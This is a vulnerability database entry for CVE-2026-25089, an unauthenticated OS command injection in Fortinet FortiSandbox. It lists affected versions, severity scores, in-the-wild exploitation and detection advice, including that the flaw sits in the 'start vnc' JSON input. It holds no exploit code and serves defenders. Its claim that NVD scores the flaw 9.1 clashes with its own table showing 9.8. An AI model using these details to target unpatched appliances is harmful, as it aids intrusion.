cbcvebase.
CVE-2026-25089
published 2026-06-09

CVE-2026-25089: A improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5…

PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
23.39%
97.5th percentile
A improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests

Affected

12 ranges
VendorProductVersion rangeFixed in
fortinetfortinet
fortinetfortisandbox
fortinetfortisandbox4.2.0 – 4.2.8
fortinetfortisandbox4.2.1 – 4.2.8
fortinetfortisandbox>= 4.4.0 < 4.4.94.4.9
fortinetfortisandbox4.4.0 – 4.4.8
fortinetfortisandbox>= 5.0.0 < 5.0.65.0.6
fortinetfortisandbox5.0.0 – 5.0.5
fortinetfortisandbox_cloud>= 5.0.4 < 5.0.65.0.6
fortinetfortisandbox_cloud5.0.4 – 5.0.5
fortinetfortisandbox_paas>= 5.0.4 < 5.0.65.0.6
fortinetfortisandbox_paas5.0.4 – 5.0.5

Detection & IOCsextracted from sources · hover to see the quote

  • CVE-2026-25089 is exploited via specifically crafted HTTP requests targeting the FortiSandbox WEB UI; monitor for anomalous/malformed HTTP requests to FortiSandbox management interfaces from unauthenticated sources
  • The vulnerable feature is the 'start vnc' functionality accepting JSON input; inspect HTTP requests containing JSON payloads directed at the VNC-related API endpoint for OS command injection patterns (CWE-78)
  • Active exploitation of CVE-2026-25089 has been observed in the wild; treat any FortiSandbox exposure as actively targeted and prioritize detection/patching
  • The circulating exploit for CVE-2026-25089 shows signs of AI-generated development and is reportedly faulty; no fully working public exploit has been disclosed, but attempted exploitation activity should still be expected
  • ·Affected versions span FortiSandbox 5.0.0–5.0.5, 4.4.0–4.4.8, all 4.2.x versions, FortiSandbox Cloud 5.0.4–5.0.5, and FortiSandbox PaaS 5.0.4–5.0.5; scope detection rules accordingly
  • ·This is a second-order OS command injection (CWE-78) via JSON input, meaning the injected payload may be stored and triggered later rather than immediately — standard first-order injection detection may miss it
  • ·CVSS score differs between sources: NVD lists 9.1 while Fortinet's own PSIRT advisory rates it 9.8 (Critical); use 9.8 for internal risk prioritization

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.